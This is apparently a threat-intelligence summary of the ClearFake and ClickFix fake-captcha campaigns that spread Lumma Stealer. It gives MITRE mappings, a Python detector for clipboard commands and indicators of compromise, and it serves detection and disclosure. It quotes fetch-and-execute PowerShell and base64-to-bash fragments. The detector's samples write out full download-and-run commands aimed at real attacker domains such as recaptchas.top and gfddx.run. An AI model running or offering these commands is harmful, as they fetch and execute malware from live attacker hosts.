In early 2024, the operators behind ClearFake’s fake browser update lures moved to the more effective ClickFix fake captcha technique, driving widespread Lumma Stealer infections and credential theft. The shift shows how propagation, social engineering narratives and technical evasion matured together, including abuse of trusted platforms such as Google Scripts and cross-platform payloads. #ClearFake #ClickFix #LummaStealer
Keypoints
- ClearFake campaign used fake browser update pop-ups on compromised WordPress sites to deliver Lumma stealer malware.
- ClickFix replaced the file download with a fake captcha page that silently copied a malicious PowerShell command to the victim’s clipboard and instructed the victim to paste and run it, so no downloaded file ever reached browser or endpoint download protections; this increased both stealth and infection success.
- Propagation evolved from malvertising to targeted delivery through compromised sites, social media, developer platforms, and SEO-driven bait sites.
- Social engineering narratives became more convincing, mimicking popular anti-bot systems, dynamically branding captchas to sites, and introducing urgency messaging.
- Technical evasion included command obfuscation, dynamic script loading, URL shortening, embedding malicious code in trusted libraries, and hosting payloads on Google Scripts domains.
- Payloads expanded to cross-platform support, targeting macOS and Linux with shell scripts exploiting user trust and unfamiliarity with command lines.
- Clustering analysis of clipboard payloads revealed distinct attacker profiles, infrastructure reuse, and operational toolkits, enabling larger-scale threat detection.
MITRE Techniques
- [T1059.001] PowerShell – The clipboard payload is an obfuscated PowerShell one-liner that runs without a profile and with a hidden window, fetches a script from an attacker URL with Invoke-RestMethod and executes it in memory with Invoke-Expression, so no script file is written to disk. (“powershell -NoProfile -WindowStyle Hidden -Command …Invoke-RestMethod…Invoke-Expression”)
- [T1071.001] Web Protocols – Malicious payloads were delivered via HTTP(S) requests to attacker-controlled domains hosting the second-stage dropper. (“Invoke-RestMethod -Uri $url”)
- [T1566.002] Phishing: Spearphishing Link – Phishing emails impersonating legitimate services such as Booking.com linked victims to a branded login page that redirected to a Booking-themed fake captcha; no attachment was involved. The fake browser update pop-ups served from compromised sites and malvertising are better classed as Drive-by Compromise (T1189). (“Booking-branded login page…redirected to a Booking-themed fake captcha”)
- [T1140] Deobfuscate/Decode Files or Information – The pasted commands decode themselves on the victim host, for example a base64 blob piped into bash on Linux and macOS, while casing mutations and string concatenation in the PowerShell variants exist only to defeat simple signature matching. (“PoWerSheLL”, “echo … | base64 -d | bash”)
- [T1583.006] Acquire Infrastructure: Web Services – Fake captcha flows were hosted on Google Apps Script (script.google.com), so the lure sat on a google.com subdomain and inherited that domain’s reputation with URL-filtering and reputation-based controls. (“hosting their fake captcha flows on google.com subdomains”)
- [T1027] Obfuscated Files or Information – Compromised sites pulled obfuscated attacker code from external servers at runtime instead of embedding it, which left fewer static artifacts for site owners and scanners to find and let the operators rotate the injected code without touching the site again. (“pulling in obfuscated code from attacker-controlled servers at runtime”)
- [T1204] User Execution – The chain depends on the victim pasting the clipboard contents into the Windows Run dialog or a terminal and running them; the pasted command then retrieves the next stage and executes it in memory. (“Invoke-Expression $response”)
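The key points on command obfuscation, cross-platform payloads and clipboard-payload clustering, together with the PowerShell and decoding technique entries above, describe what a detection has to cope with: casing mutations, base64 layers in both the PowerShell (-EncodedCommand, UTF-16LE) and the shell (echo … | base64 -d | bash) form, and a fetch-then-execute pair that points at attacker infrastructure. The following is an added example written for this page, not code from the original report or any vendor tooling. It normalises and decodes constructed clipboard commands, scores them on those indicators, and groups the suspicious ones by the domain they contact; the sample commands are constructed, recaptchas.top and gfddx.run are borrowed from the IoC list above, github.com is a benign control, and the indicator weights and threshold are assumptions to tune against your own telemetry.

```python
"""Normalise, decode and score ClickFix-style clipboard commands, then group the
suspicious ones by the infrastructure they contact. Added example; sample
commands are constructed, weights and threshold are assumptions."""
import base64
import re
from collections import defaultdict

# Host part of any http(s) URL, used for the infrastructure clustering step.
URL_RE = re.compile(r"https?://([a-z0-9.-]+\.[a-z]{2,})", re.I)
# PowerShell -e/-ec/-en/-enc/-EncodedCommand <base64>; the payload is UTF-16LE.
PS_ENC_RE = re.compile(r"-e(?:ncodedcommand|nc|n|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)
# Linux/macOS form seen in the report: echo <base64> | base64 -d | bash
SH_B64_RE = re.compile(
    r"echo\s+['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|\s*base64\s+(?:-d|--decode)", re.I)

# Indicator name -> (pattern matched against lower-cased text, weight).
# Lower-casing first is what neutralises casing mutations such as "PoWerSheLL".
INDICATORS = {
    "powershell-launcher": (re.compile(r"\bpowershell\b|\bpwsh\b"), 1),
    "hidden-or-noprofile": (re.compile(r"-w(?:indowstyle)?\s+hidden|-nop(?:rofile)?\b"), 1),
    "encoded-command": (re.compile(r"-e(?:ncodedcommand|nc|n|c)?\s+[a-z0-9+/=]{16,}"), 2),
    "remote-fetch": (re.compile(
        r"invoke-restmethod|invoke-webrequest|\birm\b|\biwr\b|\bcurl\b|\bwget\b"), 2),
    "in-memory-exec": (re.compile(r"invoke-expression|\biex\b|\|\s*(?:bash|sh|zsh)\b"), 3),
    "base64-decode": (re.compile(r"base64\s+(?:-d|--decode)|frombase64string"), 2),
    "captcha-lure-text": (re.compile(r"not a robot|recaptcha verification"), 1),
}
THRESHOLD = 5  # assumption: a fetch (2) plus in-memory execute (3) is enough to flag


def decode_layers(cmd: str) -> list[str]:
    """Return the command plus every base64 layer it carries, decoded.
    PowerShell -EncodedCommand is UTF-16LE; the shell form is plain bytes."""
    layers = [cmd]
    for m in PS_ENC_RE.finditer(cmd):
        try:
            layers.append(base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace"))
        except ValueError:  # binascii.Error is a ValueError: not really base64
            pass
    for m in SH_B64_RE.finditer(cmd):
        try:
            layers.append(base64.b64decode(m.group(1)).decode("utf-8", errors="replace"))
        except ValueError:
            pass
    return layers


def analyze(cmd: str) -> dict:
    """Score one clipboard command across all of its decoded layers."""
    reasons, domains = set(), set()
    for layer in decode_layers(cmd):
        text = layer.lower()  # fold casing mutations before keyword matching
        for name, (pattern, _weight) in INDICATORS.items():
            if pattern.search(text):
                reasons.add(name)  # each indicator counts once, whichever layer hit
        domains.update(d.lower() for d in URL_RE.findall(layer))
    score = sum(INDICATORS[r][1] for r in reasons)
    return {"score": score, "suspicious": score >= THRESHOLD,
            "reasons": sorted(reasons), "domains": sorted(domains)}


def cluster_by_domain(commands: list[str]) -> dict[str, list[int]]:
    """Group flagged commands by contacted domain: shared infrastructure across
    otherwise different-looking payloads is what exposes one operator's toolkit."""
    clusters = defaultdict(list)
    for idx, cmd in enumerate(commands):
        result = analyze(cmd)
        if result["suspicious"]:
            for domain in result["domains"]:
                clusters[domain].append(idx)
    return dict(clusters)


def b64(text: str, encoding: str = "utf-8") -> str:
    return base64.b64encode(text.encode(encoding)).decode("ascii")


# Constructed sample clipboard contents (not captured data). recaptchas.top and
# gfddx.run come from the IoC list; the last two entries are benign controls.
SAMPLES = [
    "PoWerSheLL -NoProfile -WindowStyle Hidden -Command "
    "\"$r = Invoke-RestMethod -Uri 'https://recaptchas.top/api/v1'; Invoke-Expression $r\"",
    "powershell -ep bypass -enc " + b64("iex (irm 'https://recaptchas.top/p')", "utf-16-le"),
    "echo " + b64("curl -fsSL https://gfddx.run/x | bash") + " | base64 -d | bash",
    "I am not a robot - reCAPTCHA Verification ID: 8421",
    "git clone https://github.com/example/repo.git",
]

if __name__ == "__main__":
    for idx, cmd in enumerate(SAMPLES):
        r = analyze(cmd)
        print(idx, "SUSPICIOUS" if r["suspicious"] else "benign", r["score"], r["reasons"], r["domains"])
    print(cluster_by_domain(SAMPLES))
```

In practice the input comes from clipboard-monitoring or Run-dialog (RunMRU) telemetry rather than a list literal; the point of decoding every layer before matching is that the encoded PowerShell and the base64-to-bash forms carry their fetch-and-execute pair, and the domain, only inside the decoded text, and the same domain then links the Windows and the Linux/macOS variants to one cluster.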
Indicators of Compromise
- [Domains] Fake captcha and compromised sites delivering malicious payloads – example: 866059.eliteeyeview.co, candy-pdf-convertor.world, recaptchas.top, and many more.
- [Domains] Attacker-controlled payload hosting and command delivery – example: cmbkz8bui000008k22bcm3b3k3k.info, fepez.run, gfddx.run, recaptchas.top, and numerous others.
- [IP Addresses] Payload delivery and attacker infrastructure – example: 45.135.232.33, 138.199.156.22, 159.223.139.207, 193.36.38.237, among others.
- [File Names] Malicious script and payload files often dynamically loaded, e.g., socket.io.min.js injected with obfuscated code and attacker-controlled Google Scripts URLs.